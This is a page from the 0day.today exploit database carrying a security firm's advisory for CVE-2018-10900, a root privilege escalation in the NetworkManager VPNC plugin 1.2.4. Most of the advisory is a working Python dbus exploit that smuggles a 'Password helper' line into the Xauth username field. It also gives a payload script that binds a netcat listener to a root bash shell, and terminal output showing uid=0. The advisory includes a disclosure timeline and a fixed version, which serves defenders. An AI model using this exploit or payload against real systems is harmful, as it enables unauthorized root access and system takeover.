0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Network Manager VPNC 1.2.4 Privilege Escalation Vulnerability

Author

Denis Andzakovic

Risk

[

Security Risk High

]

0day-ID

Category

Date add

CVE

Platform

Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
CVE: CVE-2018-10900
Author: Denis Andzakovic  
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc  
Affected Software: Network Manager VPNC a 1.2.4  

--[ Description
The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root. 

--[ Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the Password helper option to an attacker controlled executable file.

The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new line character is injected into the Xauth username parameter.

import dbus
con = {
    'vpn':{
        'service-type':'org.freedesktop.NetworkManager.vpnc',
        'data':{
            'IKE DH Group':'dh2',
            'IPSec ID':'testgroup',
            'IPSec gateway':'gateway',
            'IPSec secret-flags':'4',
            'Local Port':'0',
            'NAT Traversal Mode': 'natt',
            'Perfect Forward Secrecy': 'server',
            'Vendor': 'cisco',
            'Xauth password-flags': '4',
            'Xauth username': "username\nPassword helper /tmp/test",
            'ipsec-secret-type': 'unused',
            'xauth-password-type': 'unused'
            }
    },
    'connection':{
        'type':'vpn',
        'id':'vpnc_test',
    },
    'ipv4':{'method':'auto'},
    'ipv6':{'method':'auto'}
}
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)

The above results in the following configuration being passed to the vpnc process when the connection is initialized:  

Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950  --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt

The following figure details the complete privilege escalation attack.

doi@ubuntu:~$ cat << EOF > /tmp/test
> #!/bin/bash
> mkfifo pipe
> nc -k -l -p 8080 < pipe | /bin/bash > pipe
> EOF
doi@ubuntu:~$ python vpnc_privesc.py
doi@ubuntu:~$ nmcli connection
NAME                UUID                                  TYPE      DEVICE
Wired connection 1  a8b178fd-8cbc-3e15-aa9e-d52982215d98  ethernet  ens3
vpnc_test           233101cb-f786-44ed-9e4f-662f1a519429  vpn       ens3
doi@ubuntu:~$ nmcli connection up vpnc_test

^Z
[1]+  Stopped                 nmcli connection up vpnc_test
doi@ubuntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)

--[ Timeline

11/07/2018 - Advisory sent to security@gnome.org  
13/07/2018 - Acknowledgement from Gnome security  
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day  
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released

--[  About Pulse Security
Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services.

W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Network Manager VPNC 1.2.4 Privilege Escalation Vulnerability

Report Error

Report Error